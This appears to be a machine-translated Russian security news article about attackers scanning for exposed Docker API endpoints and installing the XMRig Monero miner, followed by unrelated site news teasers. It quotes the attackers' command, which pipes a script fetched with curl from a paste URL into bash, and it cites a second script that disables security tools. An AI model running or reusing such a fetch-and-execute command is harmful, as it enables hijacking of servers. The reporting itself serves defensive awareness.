Суббота, 27 февраля, 05:24
дома безопасность Хакеры устанавливают cryprominer на платформах Docker с открытыми конечными точками API

Хакеры устанавливают cryprominer на платформах Docker с открытыми конечными точками API

Докерские платформыИсследователи обнаружили, что RESTRAINT ± взлом Команда сканирует это в массовом порядке Интернет ищу докера платформы которые имеют конечные точки API, выставленные онлайн.

Хакеры делают сканы, чтобы разработать cryptominer на открытые платформы Docker и украсть деньги.

Профессионалы за ней хакерская кампания

Согласно им исследователи, кампания массового сканирования, запущенная в выходные дни ноября 24. Это немедленно привлекло внимание исследователей из-за его обширной области.

Трой Мурш, ведущий исследователь и соучредитель Bad Packets LLC, сказал, что Использование открытых платформ Docker не является чем-то новым. Это часто случается.

"Тогда мы просто обратили на это внимание широкий диапазон сканирования. Это само по себе потребовало дальнейших исследований, чтобы выяснить, на что это было направлено Ботнет", Он сказал.

Какую информацию мы имеем на данный момент?

На данный момент исследователи обнаружили, что хакерская команда, ответственная за это кампания, уже отсканировал более IP-сетей 59.000 (сетевых блоков) ищу открытые платформы Docker.

Если обнаружен уязвимый компьютер, Хакеры используйте API конечной точки для запуска Контейнер Alpine Linux OSгде они выполняют следующую команду:

chroot / mnt / bin / sh -c 'curl-sL4 http://ix.io/1XQa | bash;

Эта команда загружает и выполняет Bash скрипт с сервера злоумышленника. Этот скрипт затем устанавливает один Crypotminer XMRRig. По словам Мурша, в выходные хакеры украли монеты 14,82 Monero (XMR), стоит всего 740 долларов.

Еще одна вещь, которую заметили исследователи, это то, что программное обеспечение что хакеры устанавливают, имеет один мера самообороны.

"Уникальная, но интересная функция этой кампании заключается в том, что она удалить известные программы мониторинга и «убить» различные процессы, «через сценарий, исходящий из http: // ix [.] Io / 1XQh», - сказал Мурш.

Этот скрипт отключить продукты безопасностьи процессы, связанные с криптоминирующими конкурентами ботнетов, такие как DDG.

Кроме того, Мурш обнаружил, что вредоносный скрипт имеет еще одну функцию, которая сканирует зараженный компьютер путем поиска Конфигурационные файлы rConfig. Скрипт их шифрует и крадет архив и отправляет их на сервер управления и атаки злоумышленников.

Крейг Роулэнд, основатель Sandfly Security, также отметил, что хакеры создают закулисные аккаунты в взломанных контейнерах и оставление ключей SSH чтобы было проще доступ и иметь возможность удаленно контролировать всех зараженных ботов.

А пока Мурш предлагает всем им пользователи и компании, использующие платформы Docker, чтобы проверить, есть ли открытые конечные точки API в Интернете, и действовать немедленно.

ОСТАВИТЬ ОТВЕТ

Пожалуйста, введите ваш комментарий!
Пожалуйста, введите ваше имя здесь

Отсутствующая Миа
Отсутствующая Миаhttps://www.secnews.gr
Быть самим собой в мире, который постоянно пытается изменить вас, является вашим величайшим достижением

ЖИВЫЕ НОВОСТИ

Лос-Анджелес: летающие машины в городском небе к 2024 году

Летающие машины теперь на шаг ближе к тому, чтобы стать реальностью, поскольку один из крупнейших игроков в этой области заявил о себе ...

Как скрыть панель вкладок в Safari для iPad (или сбросить ее)

По умолчанию Safari для iPad отображает панель инструментов, полную вкладок браузера, если у вас открыто несколько вкладок. Если вы предпочитаете ...

Билл Гейтс говорит, что предпочитает смартфоны Android айфонам

Соучредитель Microsoft Билл Гейтс на этой неделе принял участие в своей первой встрече с компанией Clubhouse, которая ...

Киберпреступники предлагают правительствам услуги взлома

Хакерские группы, участвующие в различных киберпреступлениях, теперь настолько специализированы, что правительства штатов используют их в своих целях ...

Intel исправляет ошибки в драйверах Wi-Fi и Wireless Bluetooth

Intel столкнулась с проблемами с драйверами Wi-Fi и Wireless Bluetooth, вызывающими ошибки BSOD в устройствах Windows 10 и Bluetooth ...
00: 03: 10

Hyundai: отзыв 82.000 электромобилей станет одним из самых дорогих в истории

https://www.youtube.com/watch?v=TJxiFe0HESw Η Hyundai θα ανακαλέσει 82.000 ηλεκτρικά αυτοκίνητα για να αντικαταστήσει τις μπαταρίες τους, καθώς έγιναν 15...
00: 02: 35

Star Wars: Republic Commando выйдет на PS4 и Nintendo Switch

https://www.youtube.com/watch?v=b1whMXAa8p8 Ήταν το 1977 όταν ο George Lucas μας έβαλε στον φανταστικό κόσμο του Star Wars, μέσω...

Npower: отключает мобильное приложение после атак с заполнением учетных данных

Одна из крупнейших энергетических компаний Соединенного Королевства, Npower, была вынуждена деактивировать свое мобильное приложение, когда узнала о ...
00: 10: 11

Виртуальная реальность (VR): что это такое и как она меняет нашу жизнь?

Мы часто слышим термин «виртуальная реальность» (VR) в игровых инновациях. Однако эта технология не ограничивается ...

Гигантская компания Sequoia Capital обнаружила утечку данных

Американская компания VC Sequoia Capital сообщила, что подверглась атаке хакера. С момента своего основания в 1972 году компания венчурного капитала ...